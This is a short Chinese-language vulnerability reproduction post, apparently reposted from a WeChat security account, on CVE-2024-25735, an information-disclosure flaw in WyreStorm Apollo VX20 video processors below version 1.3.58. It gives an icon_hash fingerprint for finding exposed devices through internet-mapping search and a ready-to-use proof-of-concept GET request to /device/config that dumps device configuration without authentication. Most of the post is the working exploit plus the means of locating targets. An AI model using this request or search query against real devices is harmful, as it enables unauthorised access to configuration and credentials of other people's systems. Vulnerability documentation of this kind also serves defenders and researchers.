一:漏洞描述
WyreStorm Apollo VX20是一款功能强大的视频处理器,适用于各种需要高质量视频处理和转换的场景,如会议室演示、数字标牌展示、影音娱乐等领域。通过其多种输入输出接口、图像增强技术和音频处理功能,用户可以获得更加清晰、流畅的视频体验。该产品存在信息泄露漏洞。
二:漏洞影响版本
WyreStorm
Apollo
VX20
< 1
.3
.58
三:网络空间测绘查询
icon_hash
=
"-893957814"
四:漏洞复现
POC:
GET
/device/config
HTTP/1.1
Host
:
User-Agent
: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection
: close
Accept
: */*
Accept-Language
: en
Accept-Encoding
: gzip
原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-25735
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论